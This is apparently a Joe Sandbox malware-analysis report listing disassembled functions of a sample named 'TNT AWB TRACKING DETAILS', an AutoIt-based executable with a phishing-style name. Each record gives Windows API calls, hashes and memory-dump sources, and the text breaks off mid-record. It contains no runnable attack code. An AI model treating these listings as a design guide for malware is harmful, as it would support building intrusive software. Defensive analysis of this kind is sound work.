                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1504782959-0
                                                    • Opcode ID: 83f7e42ffbd05f6603ce9679460637a5f7e0ec85de524a58558519a2f1baf34b
                                                    • Instruction ID: abc368f0793988d33a9501298ec87020afd0de22bbc6d86fb021f70ff0b853b3
                                                    • Opcode Fuzzy Hash: 83f7e42ffbd05f6603ce9679460637a5f7e0ec85de524a58558519a2f1baf34b
                                                    • Instruction Fuzzy Hash: 2E118136900109AFCB04FBA4DE46DEEB7B8AF09320B044069F505B7262DB31AE05DB61
                                                    Function 00F18B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F18B61
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F18B73
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F18B89
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F18BA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: ed40db067b761341f55b22b4d430017ceef83ca80d64848a1bc2ded3ea0ee322
                                                    • Instruction ID: 2068ffa1eda270d434c6c41607cdcbfd02fea05f85e021423e0293795f6607a1
                                                    • Opcode Fuzzy Hash: ed40db067b761341f55b22b4d430017ceef83ca80d64848a1bc2ded3ea0ee322
                                                    • Instruction Fuzzy Hash: EE113A79901218BFDB10DB95CD84F9DBB74FB48350F204095E904B7250DA716E51EB94
                                                    Function 00EC1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 00EC12D8
                                                    • GetClientRect.USER32(?,?), ref: 00EFB5FB
                                                    • GetCursorPos.USER32(?), ref: 00EFB605
                                                    • ScreenToClient.USER32(?,?), ref: 00EFB610
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    • Opcode ID: fa2d33f39f75b7150a06fc2a43e5724df26dad334c326477365e0de8ee427abe
                                                    • Instruction ID: 459520d1d7ddb6859904453b3f2c8092d7db17e3ebe3d732378cd0a921d4273a
                                                    • Opcode Fuzzy Hash: fa2d33f39f75b7150a06fc2a43e5724df26dad334c326477365e0de8ee427abe
                                                    • Instruction Fuzzy Hash: 6911283950001DABDB04EF98D985EFEB7B8EB06301F40049AFA01E7152C731AA56ABA5
                                                    Function 00F21142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F1FCED,?,00F20D40,?,00008000), ref: 00F2115F
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F1FCED,?,00F20D40,?,00008000), ref: 00F21184
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F1FCED,?,00F20D40,?,00008000), ref: 00F2118E
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00F1FCED,?,00F20D40,?,00008000), ref: 00F211C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: 6e6a3b4855785470e9c67b8864aa60d0de1f92bde79023db63a5af89a903baa1
                                                    • Instruction ID: ab21037a33e469fc046164f1d4ea11aba849a17d715c5598d0a361b2705522ca
                                                    • Opcode Fuzzy Hash: 6e6a3b4855785470e9c67b8864aa60d0de1f92bde79023db63a5af89a903baa1
                                                    • Instruction Fuzzy Hash: 9D117035C0152DD7CF009FA5E8446EEBBBCFF29711F104055EA44B2240CB7055A4EB9A
                                                    Function 00F1D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F1D84D
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F1D864
                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F1D879
                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F1D897
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                    • String ID:
                                                    • API String ID: 1352324309-0
                                                    • Opcode ID: d60deda1cd7f8a9e090876f9a1c38cd4e2a387d90ad7020ce672086a25a11949
                                                    • Instruction ID: 950a3cb286ec16cfb8ebd7f622469ea0b85fab4f96f4eafaedc0ac28365188dc
                                                    • Opcode Fuzzy Hash: d60deda1cd7f8a9e090876f9a1c38cd4e2a387d90ad7020ce672086a25a11949
                                                    • Instruction Fuzzy Hash: 52116175A06304DBE320CF51DC08FD3BBBCEB00B20F108569A91AD6190D7B0E689ABA1
                                                    Function 00EF6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction ID: a17a94363d5b5742669e5e414b5b1647dd897e8f66a79a52ea0b3950821e9d80
                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction Fuzzy Hash: 01017B3204814EBBCF125E84DC01CEE3F62BF28355B589415FF98A8130C636C9B1AB81
                                                    Function 00F4B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00F4B2E4
                                                    • ScreenToClient.USER32(?,?), ref: 00F4B2FC
                                                    • ScreenToClient.USER32(?,?), ref: 00F4B320
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F4B33B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: 7554c2b9328f5e98d6d8669c01a5d83c229999d3171ca26272f5279bc51a6493
                                                    • Instruction ID: a754d21b6d366c14d3c6a394a618a5f5f919040249acb609fa0f66c69b7149ac
                                                    • Opcode Fuzzy Hash: 7554c2b9328f5e98d6d8669c01a5d83c229999d3171ca26272f5279bc51a6493
                                                    • Instruction Fuzzy Hash: 971143B9D0020DEFDB41CFA9D8849EEBBF9FB19310F108166E914E3220D735AA659F50
                                                    Function 00F4B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F4B644
                                                    • _memset.LIBCMT ref: 00F4B653
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F86F20,00F86F64), ref: 00F4B682
                                                    • CloseHandle.KERNEL32 ref: 00F4B694
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID:
                                                    • API String ID: 3277943733-0
                                                    • Opcode ID: a8e988eb0e8808daf987ef2448aa6766e731a64373eb404deb1db294c4256d87
                                                    • Instruction ID: 436ec2f0d53379e1cfae7f0e9eb998b16e16ec275611f0cebc8e7d770c39b649
                                                    • Opcode Fuzzy Hash: a8e988eb0e8808daf987ef2448aa6766e731a64373eb404deb1db294c4256d87
                                                    • Instruction Fuzzy Hash: 53F0FEB2940308BAE2102B65BC06FFB7A9CEB19795F005025BB08E5192E7759C10A7A8
                                                    Function 00F26BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 00F26BE6
                                                      • Part of subcall function 00F276C4: _memset.LIBCMT ref: 00F276F9
                                                    • _memmove.LIBCMT ref: 00F26C09
                                                    • _memset.LIBCMT ref: 00F26C16
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00F26C26
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                    • String ID:
                                                    • API String ID: 48991266-0
                                                    • Opcode ID: 1b2bd7035f783e59315e6f157bb9f46829bacfa72631ae095b7a014a9c49d671
                                                    • Instruction ID: 95639ff807087a31ce01b4a719631adcab5288e36e751c46e62c94b2df7faab6
                                                    • Opcode Fuzzy Hash: 1b2bd7035f783e59315e6f157bb9f46829bacfa72631ae095b7a014a9c49d671
                                                    • Instruction Fuzzy Hash: E2F05E3A200214ABCF016F95EC85A8ABF69EF46360F048065FE086E227C775E911DBB4
                                                    Function 00EC2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 00EC2231
                                                    • SetTextColor.GDI32(?,000000FF), ref: 00EC223B
                                                    • SetBkMode.GDI32(?,00000001), ref: 00EC2250
                                                    • GetStockObject.GDI32(00000005), ref: 00EC2258
                                                    • GetWindowDC.USER32(?,00000000), ref: 00EFBE83
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EFBE90
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00EFBEA9
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00EFBEC2
                                                    • GetPixel.GDI32(00000000,?,?), ref: 00EFBEE2
                                                    • ReleaseDC.USER32(?,00000000), ref: 00EFBEED
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    • Opcode ID: bd4ef4b5293333d2b63f91965e3dab9bd2c54e210a603f3a95ded16803982389
                                                    • Instruction ID: 8dd27a30e86b4f9a6ed521fa088f51920922b49c20049f4efc7861f28a25b63d
                                                    • Opcode Fuzzy Hash: bd4ef4b5293333d2b63f91965e3dab9bd2c54e210a603f3a95ded16803982389
                                                    • Instruction Fuzzy Hash: 7EE03036504248EADB215F64EC0D7D83B10EB56336F048366FF6D980E187714584EB11
                                                    Function 00F18712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00F1871B
                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F182E6), ref: 00F18722
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F182E6), ref: 00F1872F
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F182E6), ref: 00F18736
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    • Opcode ID: fc1eb791e1d3468753e4a996542f9947294f18f819f36c4242624bb719af31be
                                                    • Instruction ID: acb4d04defdae3745116975cf252e6bf4716d9c914c8a45b5233c6c8a8998d49
                                                    • Opcode Fuzzy Hash: fc1eb791e1d3468753e4a996542f9947294f18f819f36c4242624bb719af31be
                                                    • Instruction Fuzzy Hash: 6BE0CD3AA113159BE7205FF45D0CB973BACEF727E1F144838FA49CA080DA34848AE750
                                                    Function 00EE5DAC Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __getptd_noexit.LIBCMT ref: 00EE5DAD
                                                      • Part of subcall function 00EE99C4: GetLastError.KERNEL32(00000000,00EE0DD3,00EE8B2D,00EE57A3,?,?,00EE0DD3,?), ref: 00EE99C6
                                                      • Part of subcall function 00EE99C4: __calloc_crt.LIBCMT ref: 00EE99E7
                                                      • Part of subcall function 00EE99C4: __initptd.LIBCMT ref: 00EE9A09
                                                      • Part of subcall function 00EE99C4: GetCurrentThreadId.KERNEL32 ref: 00EE9A10
                                                      • Part of subcall function 00EE99C4: SetLastError.KERNEL32(00000000,00EE0DD3,?), ref: 00EE9A28
                                                    • CloseHandle.KERNEL32(?,?,00EE5D8C), ref: 00EE5DC1
                                                    • __freeptd.LIBCMT ref: 00EE5DC8
                                                    • ExitThread.KERNEL32 ref: 00EE5DD0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                    • String ID:
                                                    • API String ID: 4169687693-0
                                                    • Opcode ID: 117d2222aaead42c31db7aa573e377b44df7d5759013073bf6ba14f13137ec9f
                                                    • Instruction ID: 41870cdae4195bd4923e62c3fe18f158d057fdee5270458940a72dcfc56d2d00
                                                    • Opcode Fuzzy Hash: 117d2222aaead42c31db7aa573e377b44df7d5759013073bf6ba14f13137ec9f
                                                    • Instruction Fuzzy Hash: 50D0A732001F5847C2322B718C0D63A33D09F01B29F049218F469651F28B2058028A41
                                                    Function 00F1B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00F1B4BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ContainedObject
                                                    • String ID: AutoIt3GUI$Container
                                                    • API String ID: 3565006973-3941886329
                                                    • Opcode ID: 064e58648765fc0cef0a307d8fcc2654499a71598e2c4a9785830aeccd9c25dc
                                                    • Instruction ID: 966da145adfa87bf13058f7a938f8fde5f640f6e209bc5e0f7a8e3acf705cebf
                                                    • Opcode Fuzzy Hash: 064e58648765fc0cef0a307d8fcc2654499a71598e2c4a9785830aeccd9c25dc
                                                    • Instruction Fuzzy Hash: 86915871600601EFDB14DF68C884BAAB7E5FF49710F24856EE94ACB2A1DB71E881DB50
                                                    Function 00F2AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EDFC86: _wcscpy.LIBCMT ref: 00EDFCA9
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • __wcsnicmp.LIBCMT ref: 00F2B02D
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F2B0F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    • Opcode ID: 6b8ac7013e3a97254e0dd7651b04e9aea983cd1ded9a9b27849553cda959ac56
                                                    • Instruction ID: 4d345f331a8bcdcfaa3f66eec403ec54dadb10878ed38fce937d538801e2d04f
                                                    • Opcode Fuzzy Hash: 6b8ac7013e3a97254e0dd7651b04e9aea983cd1ded9a9b27849553cda959ac56
                                                    • Instruction Fuzzy Hash: 19619276E00229AFCB18DF94D895EAEB7F4EF08710F104069F916AB391D770AE81DB50
                                                    Function 00ED2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00ED2968
                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00ED2981
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: f69069309185164b6fc71e90139f2003edd9a29fcda901e3afa6ddd0b2ae701e
                                                    • Instruction ID: 4c6bc218ecc6a51b5e72663f6cad98ab7bec6a0e980794f9541788d85049f0d4
                                                    • Opcode Fuzzy Hash: f69069309185164b6fc71e90139f2003edd9a29fcda901e3afa6ddd0b2ae701e
                                                    • Instruction Fuzzy Hash: 34515A724087489BD320EF10DD86BAFBBE8FF85344F41485DF2D8521A2DB719529CB66
                                                    Function 00F29734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC4F0B: __fread_nolock.LIBCMT ref: 00EC4F29
                                                    • _wcscmp.LIBCMT ref: 00F29824
                                                    • _wcscmp.LIBCMT ref: 00F29837
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    • Opcode ID: 8b870828cba9041b7d843090aa57a9c765cdad45e2c129f9f25fd6f7f6c6ec7d
                                                    • Instruction ID: 56ae422ef8e26b2a60e02aaf02c4306d064d74f1445e229ae877e59eeaeed942
